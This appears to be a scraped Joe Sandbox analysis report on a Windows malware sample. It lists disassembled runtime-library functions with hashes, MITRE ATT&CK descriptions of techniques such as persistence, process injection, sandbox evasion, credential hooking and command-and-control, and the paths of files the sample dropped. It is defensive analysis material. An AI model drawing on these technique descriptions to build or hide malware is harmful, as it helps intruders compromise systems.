Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 20a4edf719907beca1d2384c8ba0f35c015db5c5e5bbf7c15f3965288ab0a0af
Instruction ID: cb439e17f34631374d90d88282caec430cdf1db4c42b470ed77a213ad98b7bbb
Opcode Fuzzy Hash: 20a4edf719907beca1d2384c8ba0f35c015db5c5e5bbf7c15f3965288ab0a0af
Instruction Fuzzy Hash: ED21F0BC8B8204DFD760DF64ED84E583BB0BB0A306F40401AE50886AB1EB785884EF46

Function 009421E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00949458,0000000C,00942320,00000000,00000000,?,0094174F,00000003,?,?,?,?,?,?,009410F6), ref: 009421F7
__crt_waiting_on_module_handle.LIBCMT ref: 00942202

Part of subcall function 009413E1: Sleep.KERNEL32(000003E8,00000000,?,00942148,KERNEL32.DLL,?,00942194,?,0094174F,00000003), ref: 009413ED
Part of subcall function 009413E1: GetModuleHandleW.KERNEL32(?,?,00942148,KERNEL32.DLL,?,00942194,?,0094174F,00000003,?,?,?,?,?,?,009410F6), ref: 009413F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0094222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0094223B
__lock.LIBCMT ref: 0094225D
InterlockedIncrement.KERNEL32(0094A4D8), ref: 0094226A
__lock.LIBCMT ref: 0094227E
___addlocaleref.LIBCMT ref: 0094229C

Strings

DecodePointer, xrefs: 00942233
KERNEL32.DLL, xrefs: 009421F1, 009421F6, 00942201
EncodePointer, xrefs: 0094221F

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 4a69c1bc2b9415cd5a01c668fc8c59bc25b767b7dda381fe475f40ccc27692ae
Instruction ID: 871cd716ce2677a4a32e123a5856b088e1bdea5938d6df8e7b98cdb302686f80
Opcode Fuzzy Hash: 4a69c1bc2b9415cd5a01c668fc8c59bc25b767b7dda381fe475f40ccc27692ae
Instruction Fuzzy Hash: E911DF709407009FD720AF75D845F9FBBE0BF91324F60451AF4A9A32A0CBB09A409B24

Function 009440A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 009440AC

Part of subcall function 00942345: __getptd_noexit.LIBCMT ref: 00942348
Part of subcall function 00942345: __amsg_exit.LIBCMT ref: 00942355

__amsg_exit.LIBCMT ref: 009440CC
__lock.LIBCMT ref: 009440DC
InterlockedDecrement.KERNEL32(?), ref: 009440F9
InterlockedIncrement.KERNEL32(02AF2AF0), ref: 00944124

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 85f572d2b4062f0e6849955c46742cf6c019b7b5e646648b36ac33e2403f8e1b
Instruction ID: 4e48408d2ccd4d9db0bf330ea8efd3fb5bb21a335eea39d1e965b3ee4ed499cb
Opcode Fuzzy Hash: 85f572d2b4062f0e6849955c46742cf6c019b7b5e646648b36ac33e2403f8e1b
Instruction Fuzzy Hash: 07019732D19721EBDB21AF248806F5DB360BF98714F014005F900B3291CB34AD91EFD6

Function 009435EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0094360C

Part of subcall function 00942AA0: __mtinitlocknum.LIBCMT ref: 00942AB6
Part of subcall function 00942AA0: __amsg_exit.LIBCMT ref: 00942AC2
Part of subcall function 00942AA0: EnterCriticalSection.KERNEL32(?,?,?,00945600,00000004,00949628,0000000C,00943746,?,?,00000000,00000000,00000000,?,009422F7,00000001), ref: 00942ACA

___sbh_find_block.LIBCMT ref: 00943617
___sbh_free_block.LIBCMT ref: 00943626
HeapFree.KERNEL32(00000000,?,00949568,0000000C,00942A81,00000000,009494C8,0000000C,00942ABB,?,?,?,00945600,00000004,00949628,0000000C), ref: 00943656
GetLastError.KERNEL32(?,00945600,00000004,00949628,0000000C,00943746,?,?,00000000,00000000,00000000,?,009422F7,00000001,00000214), ref: 00943667

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a28b0998c233b4c209421aa7e4051b15829018eef23ccfb7e19cda07db47bef3
Instruction ID: 6c383b50bb728766aea3de314f7b4df000ccb2ff22807642ed5a4a19461d038c
Opcode Fuzzy Hash: a28b0998c233b4c209421aa7e4051b15829018eef23ccfb7e19cda07db47bef3
Instruction Fuzzy Hash: E401D631C18306BADB307F719C07F4E3768BF91720FA18109F440661D1CF348A40DA58

Function 00943E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00943E10

Part of subcall function 00942345: __getptd_noexit.LIBCMT ref: 00942348
Part of subcall function 00942345: __amsg_exit.LIBCMT ref: 00942355

__getptd.LIBCMT ref: 00943E27
__amsg_exit.LIBCMT ref: 00943E35
__lock.LIBCMT ref: 00943E45

Memory Dump Source

Source File: 00000029.00000002.2814496271.0000000000941000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00940000, based on PE: true

Associated: 00000029.00000002.2814477395.0000000000940000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814536959.000000000094A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000029.00000002.2814604611.000000000094C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_940000_aPkMBkaA.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 624b82569006540f84c3241c56e67dba7d84d187a246fa9548dd7b4887e18b83
Instruction ID: e81dd0d4d4b3c0b8c13a17bb5717ef2dfbc2af602d4f64f85e745333ef46dc94
Opcode Fuzzy Hash: 624b82569006540f84c3241c56e67dba7d84d187a246fa9548dd7b4887e18b83
Instruction Fuzzy Hash: 8DF03A329457018BE730FF75880AF4E72A0BF94B20F918659F445976E2CB789A419B52

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 0000000000000000.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Change of critical system settings

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe

C:\Program Files (x86)\Nw13Wr\log.src

C:\Program Files (x86)\Nw13Wr\tbcore3U.dll

C:\Program Files (x86)\Nw13Wr\utils.vcxproj

C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe

C:\Program Files (x86)\W9sgnm2c\log.src

C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll

C:\Program Files (x86)\W9sgnm2c\utils.vcxproj

C:\Users\Public\Music\destopbak.ini

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Windows Analysis Report
0000000000000000.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre